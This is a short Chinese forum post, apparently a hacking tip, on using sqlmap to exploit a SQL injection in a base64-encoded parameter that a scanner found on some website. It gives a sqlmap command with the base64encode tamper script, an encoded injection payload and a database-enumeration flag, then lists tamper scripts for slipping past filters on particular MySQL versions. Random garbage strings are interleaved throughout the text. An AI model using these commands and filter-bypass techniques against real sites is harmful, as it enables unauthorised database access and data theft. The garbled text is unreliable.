WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?; j# ]: Q8 x& ~8 p4 q
3 D4 [4 P3 O; w: \% N' ?sqlmap的tamper里有个base64encode.py
" b0 h/ B, ?0 |1 ]6 T
9 G7 O! p2 Y) F, i. l使用如下
( r# N2 o5 G, l% q6 t
' r) y2 ?1 D, e: Gsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
/ H( e0 m8 E9 {6 L$ P. J5 l9 V4 r: q' Q* H5 [: c* g- |
' Z3 t; S( t) p6 F5 i: V# @) O% B6 tsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
4 v4 m o8 n- \! c$ w/ q4 m" M( a( N& F/ `
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
' y* W% n3 X r, z: c+ q& P( m5 f" V1 T& q- l
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
+ t5 ^( e G8 X% x$ Fspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入1 z( t/ Z7 {8 i a. ~3 e
首先确定目标数据库版本,然后选择相应的脚本。
/ Q9 h1 [& w+ ]3 ?8 D-v 3 --batch --tamper "space2hash.py"
7 M! y0 `( _* [& y" [/ Z, M" x8 B& }: q
还有其他一些插件:
) ^. {" n7 E# I' F. e1 `+ Sencodes编码 ——charencode.py8 n) G! D4 R+ P) D! N2 H- q3 j
base64编码 —— base64encode.py2 y# T. \5 |9 E4 m* {9 g: s3 X1 |1 {
替换空格和关键字 —— halfversionedmorekeywords.py* M2 o! |6 R4 R* P
| ( s2 c2 x: {( m2 c
1 ?0 Z/ _8 c( Z) L7 Z2 |) S
: q) t( ~$ I! a- Z# Z* D G
4 P. \( V$ S, O2 h8 a2 A# z% z |